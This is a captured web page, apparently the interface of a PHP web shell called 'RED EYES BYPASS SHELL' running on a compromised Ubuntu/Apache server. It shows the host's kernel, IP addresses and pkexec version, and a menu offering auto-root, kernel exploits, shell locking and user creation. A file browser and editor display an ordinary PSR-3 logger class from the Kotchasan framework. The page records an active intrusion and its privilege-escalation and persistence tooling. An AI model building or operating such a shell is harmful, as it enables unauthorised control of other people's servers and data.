Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
commert /
accout /
Kotchasan /
Log /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
AbstractLogger.php
3.12
KB
-rwxr-xr-x
Logger.php
3.96
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AbstractLogger.php
<?php /** * @filesource Kotchasan/Log/AbstractLogger.php * * @copyright 2016 Goragod.com * @license https://www.kotchasan.com/license/ * * @see https://www.kotchasan.com/ */ namespace Kotchasan\Log; use Psr\Log\LogLevel; /** * Kotchasan Logger Class (PSR-3) * * @author Goragod Wiriya <admin@goragod.com> * * @since 1.0 */ abstract class AbstractLogger { /** * Action must be taken immediately * * Example: Entire website down, database unavailable, etc. This should * trigger the SMS alerts and wake you up * * @param string $message * @param array $context */ public function alert($message, array $context = array()) { $this->log(LogLevel::ALERT, $message, $context); } /** * Critical conditions * * Example: Application component unavailable, unexpected exception * * @param string $message * @param array $context */ public function critical($message, array $context = array()) { $this->log(LogLevel::CRITICAL, $message, $context); } /** * Detailed debug information * * @param string $message * @param array $context */ public function debug($message, array $context = array()) { $this->log(LogLevel::DEBUG, $message, $context); } /** * System is unusable * * @param string $message * @param array $context */ public function emergency($message, array $context = array()) { $this->log(LogLevel::EMERGENCY, $message, $context); } /** * Runtime errors that do not require immediate action but should typically * be logged and monitored * * @param string $message * @param array $context */ public function error($message, array $context = array()) { $this->log(LogLevel::ERROR, $message, $context); } /** * Interesting events * * Example: User logs in, SQL logs * * @param string $message * @param array $context */ public function info($message, array $context = array()) { $this->log(LogLevel::INFO, $message, $context); } /** * Logs with an arbitrary level * * @param mixed $level * @param string $message * @param array $context */ abstract public function log($level, $message, array $context = array()); /** * Normal but significant events * * @param string $message * @param array $context */ public function notice($message, array $context = array()) { $this->log(LogLevel::NOTICE, $message, $context); } /** * Exceptional occurrences that are not errors * * Example: Use of deprecated APIs, poor use of an API, undesirable things * that are not necessarily wrong * * @param string $message * @param array $context */ public function warning($message, array $context = array()) { $this->log(LogLevel::WARNING, $message, $context); } }
Close